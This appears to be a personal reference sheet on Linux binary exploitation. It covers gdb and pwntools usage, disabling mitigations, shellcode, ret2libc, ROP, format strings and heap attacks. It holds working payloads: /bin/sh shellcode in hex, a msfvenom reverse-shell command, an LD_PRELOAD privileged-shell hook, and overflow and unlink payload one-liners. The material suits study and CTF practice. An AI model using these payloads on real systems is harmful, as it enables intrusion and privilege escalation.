Last changed: 31.07.2020
linux exploitation
show imports
ldd my_binary
nm -D my_binary
readelf -d my_binary
locate buffer overflow
ltrace -i ./my_binary `python -c 'python -c 'from pwn import *; g=cyclic_gen(string.ascii_lowercase); print(g.get(100))'`
setup gdb extensions
clone peda and gef
git clone https://github.com/longld/peda.git ~/src/peda
git clone https://github.com/hugsy/gef.git -b master ~/src/gef
.gdbinit
define init-peda
source ~/src/peda/peda.py
end
define init-gef
source ~/src/gef/gef.py
end
/usr/bin/gdb-peda
#!/bin/sh
exec gdb -q -ex init-peda "$@"
/usr/bin/gdb-gef
#!/bin/sh
exec gdb -q -ex init-gef "$@"
pwntools
>>> from pwn import *
>>> p = process(['./binary'])
>>> p = remote('10.0.0.1', 1234)
>>> p.send(p32(0xdeadbeef))
>>> leak = u32(p.recv())
>>> p.interactive()
remote gdb debugging
>>> p = process(['gdbserver', 'localhost:1234', './binary'])
stripped binaries
To find the entry point of stripped PIE binaries you can set an initial break point or read the file info
(gdb) starti
(gdb) info files
(gdb) info functions
Another method is to look at imported functions and use ltrace
objdump -R my_binary
ltrace my_binary 2>$1 | grep main
source files
If you have the correspondig source code and compiled the binary with debug
information gdb
can inspect the source code.
(gdb) list
(gdb) br <filename>:<linenumber>
(gdb) info source
(gdb) info functions <search_regex>
(gdb) info line *<address>
advanced gdb features
environment variables
show env
set env test = ABC
unset env test
modify values
set $eax=1
set {int}$esp=1337
set {char [4]}0xbffffb08="ABC"
signals
info signals
handle SIGSEGV pass nostop
libraries
You can set gdb to break on library load
show stop-on-solib-events
set stop-on-solib-events 1
disable ALSR, PIE, NX, Canaries, RELRO and compiler optimization
To practice or analyze simple exploits it can help to deactivate some mitigations. In linux this can be done with the following commands.
echo 0 > /proc/sys/kernel/randomize_va_space
gcc -o test test.c -no-pie -zexecstack -fno-stack-protector -znorelro -O0
overload imported functions
#include <stdlib.h>
void usleep() {
unsetenv("LD_PRELOAD");
system("/bin/bash -p");
exit(0);
}
Compile the file as a shared object and load it with LD_PRELOAD
.
gcc -fpic -shared -o lib.so lib.c
LD_PRELOAD=/path/to/lib.sh my_binary
determine buffer length
metasploit
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb 300
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 0x396a4138
peda
gdb-peda$ pattern_create 300
gdb-peda$ pattern_offset 0x41416d41
send binary data to program input
To send your exploit to a vulnerable binary you can use a scripting language
like python
or perl
. To keep the pipe open after your payload you can use
cat
.
(perl -e 'print("A"x1234, "\xef\xbe\xad\xde", <SHELLCODE>, "\n")'; cat) | ./vuln_app
(python2 -c 'print("A"*1234 + "\xef\xbe\xad\xde" + <SHELLCODE>)'; cat) | ./vuln_app
(python3 -c 'import sys;sys.stdout.buffer.write(b"A"*1234 + b"\xef\xbe\xad\xde" + <SHELLCODE> + "\n")'; cat) | ./vuln_app
shellcode generation
Good resources for already assembled shellcode are
shell-storm.org and
exploit-db.com. You can search the local
exploit-db
.
searchsploit "Linux/ARM"
grep "Linux/ARM" /usr/share/exploitdb/files_shellcodes.csv
Infos on opcodes and linux syscalls can be found on sparksandflames.com, github.com/corkami and syscalls.kernelgrok.com.
shell.s
BITS 32
xor eax,eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
int 0x80
Assemble the file and print the opcode string
nasm shell.s -o shell
xxd -p shell
setreuid_shell.s
Some programs (e.g. bash
) drop their priviliges to the real uid before
executing. In this case you can use shellcode that sets the RUID to the EUID.
BITS 32
push 0x31
pop eax
cdq
int 0x80
mov ebx, eax
mov ecx, eax
push 0x46
pop eax
int 0x80
mov al, 0xb
push edx
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
mov ecx, edx
int 0x80
This results in a 34 byte shellcode.
echo 6a315899cd8089c389c16a4658cd80b00b52686e2f7368682f2f626989e389d1cd80 | sed 's/.\{2\}/\\x&/g'
\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80
radare2
With radare2
you can do this in one step
rasm2 -a x86 -b 32 "xor eax,eax; xor edx,edx; push eax; push 0x68732f2f; push 0x6e69622f; mov ebx,esp; push eax; push ebx; mov ecx,esp; mov al,0xb; int 0x80"
To use the hexstring in a script you can insert escape sequences.
echo 31c031d250682f2f7368682f62696e89e3505389e1b00bcd80 | sed 's/.\{2\}/\\x&/g'
\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
metasploit
Alternatively you can generate shellcode with metasploit
msfvenom -l payloads
msfvenom -p linux/x86/shell_reverse_tcp --list-options
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 -b "\x00\x0a" -f c
To test the generated shellcode you can use the following program
shellcode_test.c
#include <stdlib.h>
char sc[] = "\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
void main(){
void (*f)(void);
f = (void *)sc;
f();
}
compile the above with
gcc -m32 -z execstack -o shellcode_test shellcode_test.c
cat shellcode
Sometimes an interactive shell is not the best choice for your payload. If you
just want to read a specific file on the target you could generate a shellcode
which executes cat <FILE>
. I wrote a small
script that generates such shellcode.
modify precompiled shellcode
To disassemble and patch shellcode you can use the
Online Assembler and Disassembler on shell-storm.org
or do it with radare2
rasm2 -b 64 -d `echo "\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x80\xb8\x00\x00\x00\x48\x89\xc1\x48\x8b\x80\xe8\x02\x00\x00\x48\x2d\xe8\x02\x00\x00\x4c\x8b\x88\xe0\x02\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x58\x03\x00\x00\x48\x89\x91\x58\x03\x00\x00\xc3" | tr -d '\\\\x'` | tr '\n' ';'
rasm2 -b 64 "mov rax, qword gs:[0x188];mov rax, qword [rax + 0xb8];mov rcx, rax;mov rax, qword [rax + 0x2f0];sub rax, 0x2f0;mov r9, qword [rax + 0x2e8];cmp r9, 4;jne 0x13;mov rdx, qword [rax + 0x360];mov qword [rcx + 0x360], rdx;ret;" | sed 's/.\{2\}/\\x&/g'
trampolines
If randomization is in use you could try to find something like jmp rsp
in
a loaded library which is loaded at a fixed address. Then overwrite the return
address with such a trampoline followed by your shellcode.
find base addresses
cat /proc/<pid>/maps | grep libc
(gdb) info proc mappings
gdb-peda$ vmmap
search instructions
objdump -D /usr/lib/libc.so.6 -M intel | grep -e'jmp *rsp'
ropper -f /usr/lib/libc.so.6 -I 0xBA5E0000 --instructions 'jmp rax'
gdb-peda$ jmpcall esp libc
nasm shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 64
nasm > jmp rsp
00000000 FFE4 jmp rsp
rasm2
rasm2 -a arm -b 16 'bx sp'
6847
rasm2 -a arm -b 16 -d 6847
bx sp
search opcode with ropper
ropper -f arm_libc.so.6 -I 0xBA5E0000 --opcode 6?47
return2libc (32bit)
If the base address of the libc is fixed and if you find everything you need in
its address space you can write a return2libc
exploit.
find function addresses
gdb-peda$ x/wx system
0xb7e67310 <system>: 0x08ec8353
gdb-peda$ x/wx exit
0xb7e5a260 <exit>: 0x5a55e853
search strings with gdb
Then you lookup the string /bin/sh
which is included in the libc
.
(gdb) br __libc_start_main
(gdb) run
(gdb) info sharedlibrary
(gdb) find &system,+9999999,"/bin/sh"
search strings with peda
gdb-peda$ searchmem "/bin/sh" libc
search string with gef
gef> search-pattern "/bin/sh"
exploit
Last you overwrite the return address with <SYSTEM ADDR><EXIT ADDR></BIN/SH ADDR>
./binary `python2 -c 'print("A"*32 + "\x10\x73\xe6\xb7" + "\x60\xa2\xe5\xb7" + "\x4c\x9d\xf8\xb7")'`
return to dl-resolve
In binaries without Full Relocation Read-Only it can be possible to create
the needed parameters and call _dl_runtime_resolve
on any chosen function
in the loaded libraries.
get needed addresses
objdump -x my_binary | grep -e STRTAB -e SYMTAB -e JMPREL
gef> maintenance info sections
gef> got
buffer layout
--------------
<buffer> | fake EBP | for leave instruction
| PLT[0] | push link_map; jmp _dl_runtime_resolve
| rel_offset | <buffer + X> - JMPREL
| fake RET | after function call
| function args |
| ... |
<buffer +X> | r_offset | some GOT address for resolved address
| r_info | (<buffer + Y> - SYMTAB) << 4 | 0x7
| ... | padding till (st_name - SYMTAB) % 0x10 ==0
<buffer +Y> | st_name | <buffer + Z> - STRTAB
| st_value | 0x0 (irrelevant)
| st_size | 0x0 (irrelevant)
| st_info | 0x0 (value | 0x3 == 0)
<buffer +Z> | sym_string | function name (e.g. "execve\0")
| ... |
execution
To get your function resolved you could try to transfer the stack pointer to
your buffer with a leave; return
gadget.
There should be enough writable space above the buffer for the following stack
frames of _dl_runtime_resolve
.
A detailed writeup of this method can be found on github.
OneGadget
With the tool one_gadget you can search for a single gadget which will execute "/bin/sh".
one_gadget --base <BASE_ADDRESS> libc.so.6
return oriented programming
search gadgets
ropper -f my_library --nocolor > rop_gadgets.txt
ropper
can search for gadgets in binaries. ?
stands for any character and
%
for any string.
ropper -f my_library -I <base> --search 'pop e?x; pop e?x'
ropper -f my_library -I <base> --search 'mov [???], eax'
ropper -f my_library -I <base> --search 'mov [e%], eax'
generate full chain
ropper -f my_library --chain "execve cmd=/bin/sh" --badbytes 000a
find statically mapped libraries
ltrace ./my_binary 2>&1 | grep -e mmap -e open
format string exploits
In most calling conventions some or all parameters are passed on the stack.
In 64bit linux the arguments are passed in RDI RSI RDX RCX R8 R9
. Additional
arguments are passed on the stack. In Windows 64bit its RCX RDX R8 R9
and
the rest on the stack.
Depending on the format string vulnerability the content of these registers and the stack can be read or used to modify memory.
read data
First you have to find out at which parameter position your string is placed.
AAAA%08x08x08x08x08x%08x08x08x08x08x
Then you send the address you want to read and the found parameter position.
\xef\xbe\xad\xde%7$s
write data
To write data you can use the %n
placeholder to write 4 bytes, %hn
for 2
bytes and %hhn
to write a single byte. You will write the number of written
bytes to the referenced address. The number of written bytes can be modified
with the width field.
To write the value 0x1337
to the address 0xdeadbeef
use
\xef\xbe\xad\xde%4915x%7$n
\xef\xbe\xad\xde%4915x%7$hn
\xef\xbe\xad\xde\xf0\xbe\xad\xde%11x%8$hhn%36x%7$hhn
finding write locations
If you do not know the location of the return address you could try writing to
the .fini-array
, the .dtors
or the .got.plt
. If none of this works you
could look if you can overwrite the address of .fini
in the .dynamic
section.
readelf -S binary | grep -e got -e dtors -e fini -e dynamic
(gdb) maintenance info sections
gef> got
If you can only write a single byte you could try to overwrite the got
entry
of a function which is not yet resolved with the plt
entry address of another
function (e.g. system
).
pwntools
def send_fmt(s):
p.sendline(s)
d = recvuntil(prompt)
return d[:-len(prompt)]
fmt = FmtStr(execute_fmt=send_fmt, offset = str_offset)
fmt.write(target, value)
fmt.execute_writes()
libformatstr
The python module libformatstr can also help writing format string exploits.
heap overflows
heap chunks
used chunk free chunk
-------------- --------------
| prev_size | | prev_size |
| size + flags | | size + flags |
pointer -> | data | | FD pointer |
| ... | | BK pointer |
-------------- --------------
The flags are 3 bits. The LSB is the PREV_INUSE
flag.
As prev_size
is only needed if the previous chunk is free it can be used for
data by a previous chunk which is in use.
You can analyse the heap with gef
gef> heap bins
gef> heap chunks
memory allocator hooks
The libc offers writable memory to put in hooking functions for debugging the memory allocation process.
(gdb) info address __malloc_hook
(gdb) info address __realloc_hook
(gdb) info address __free_hook
(gdb) info address __memalign_hook
These functions get called if the corresponding memory allocation is done. Therefore they represent perfect targets to gain code execution.
Even if malloc
is not directly called by the vulnerable binary you can
sometimes trigger it (eg. by calling printf(<64k string>)
).
dlmalloc (without safe unlinking)
Prerequisites are a chunk with a buffer overflow vulnerability into another chunk which will be freed afterwards by the program.
By overwriting the chunks metadata we can insert fake chunks to enforce coalescence and unlinking.
#define unlink(P, BK, FD){
FD = P->fd; /* chunk +8 */
BK = P->bk; /* chunk +12 */
FD->bk = BK;
BK->fd = FD;
}
Negative values are used for the sizes to avoid zero bytes. Therefore the "next" chunk is located in memory before the "previous" chunk.
fake_after_next fake_next freed chunk
-------------------- -------------------- --------------------
| "AAAA" | | "AAAA" | | "AAAA" |
| PREV_INUSE not set | | "\xf9\xff\xff\xff" | | "\xf1\xff\xff\xff" |
-------------------- | <target_addr -12> | --------------------
| <shellcode_addr> |
--------------------
To determine the need for coalescence its own PREV_INUSE
flag and the one of
the chunk after the next are checked. As that one is not set the next chunk has
to be unlinked.
The shellcode should begin with a short jump over some unused bytes as the
target_addr
will be written into this space by unlink()
.
This is an example the distance between the two chunks is 0xa0
and the value
at 0x080496cc
gets overwritten with the shellcode address 0x0804a008
.
python2 -c 'sc="\xeb\x0e"+"A"*14+"\xcc"; print(sc+"A"*(0xa0-8-len(sc)-5*4)+"\x02"+"A"*7+"\xf9\xff\xff\xff"+"\xb8\x96\x04\x08"+"\x08\xa0\x04\x08"+"A"*4+"\xf1\xff\xff\xff")'
leaking heap bin addresses
If a chunk from a heap bin is not overwritten it can be possible to optain the values of its FD or BK pointers. This can be interesting if they point to the list head e.g. in the main arena of libc.
tcache poisoning
The Tcache
is another fast heap bin which can hold up to 7 singly linked free
chunks for each size.
By overwriting the FD pointer of a chunk in the Tcache
you could trick malloc
into returning any arbitrary memory location if another chunk is requested from
after the corrupted one.
Sigreturn Oriented Programming
An interesting alternative method for execution flow control is Sigreturn Oriented Programming (SROP).
By calling the sigreturn
syscall (0xf
) the kernel will try to read a signal
frame from the current stack position and will update the cpu context
accordingly.
from pwn import *
context.clear(arch="amd64")
frame = SigreturnFrame(kernel="amd64")
frame.rax = 59 # execve
frame.rdi = ptr_command
frame.rsi = 0
frame.rdx = 0
Multiple frames can be chained with a syscall; retn;
gadget.
debugging other architectures
run in qemu
qemu-mips -noaslr -g 1234 ./mips_binary
connect with gdb-multiarch
gdb-multiarch
set endian big
set architecture mips
target remote localhost:1234